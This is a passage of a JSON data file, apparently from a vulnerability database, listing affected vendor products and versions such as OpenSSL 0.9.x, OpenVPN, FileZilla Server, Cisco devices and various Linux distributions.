            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "3.0"
          },
          {
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "ons",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154548.0"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "x8610.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(2)"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.11"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.2"
          },
          {
            "model": "hardware management console for iseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "s8710 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "server c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.1"
          },
          {
            "model": "grid engine update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "linux database server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "hardware management console for pseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(3)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "grid engine update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(0)"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.5"
          },
          {
            "model": "server 0.9.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.4.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "call manager es32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "call manager 4.1 sr4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1-1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.14"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(1)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.2"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.9"
          },
          {
            "model": "server a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.2"
          },
          {
            "model": "propack sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "3.0"
          },
          {
            "model": "computing snapgear sg560",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "grid engine sun linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "hardware management console for pseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "stonebeat fullcluster for gauntlet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1050"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "networks meridian option 51c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3x86"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.6.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "server 0.8.6a",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "-release-p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "aironet acs350 c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3502.6"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.3"
          },
          {
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(3)"
          },
          {
            "model": "hardware management console for iseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "call manager sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.2.0.1"
          },
          {
            "model": "call manager sr2b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.0.201"
          },
          {
            "model": "hardware management console for iseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "call manager es07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "95000"
          },
          {
            "model": "hardware management console for pseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.2"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "7.0"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6000"
          },
          {
            "model": "networks cs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(0)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(0)"
          },
          {
            "model": "ons ios-based blades",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15454"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.5"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.7"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76550"
          },
          {
            "model": "hardware management console for iseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.2"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.5.0"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.17"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.3"
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.5"
          },
          {
            "model": "financials server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "navision",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.1"
          },
          {
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1.1"
          },
          {
            "model": "hardware management console for pseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.4"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "intuity lx",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "linux personal oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.4"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.x"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(1)"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0(2)"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.1"
          },
          {
            "model": "access registrar",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "networks meridian option 81c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.2"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1"
          },
          {
            "model": "linux openexchange server",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7.1"
          },
          {
            "model": "hardware management console for iseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.4"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(3)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "server 0.9.4d",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.42"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "grid engine update7 1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5.2"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "call manager es40",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.19"
          },
          {
            "model": "call manager es50",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.2"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.6"
          },
          {
            "model": "secure acs for windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ids",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2700"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1740"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1010"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3(5)"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.659"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.1"
          },
          {
            "model": "networks communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
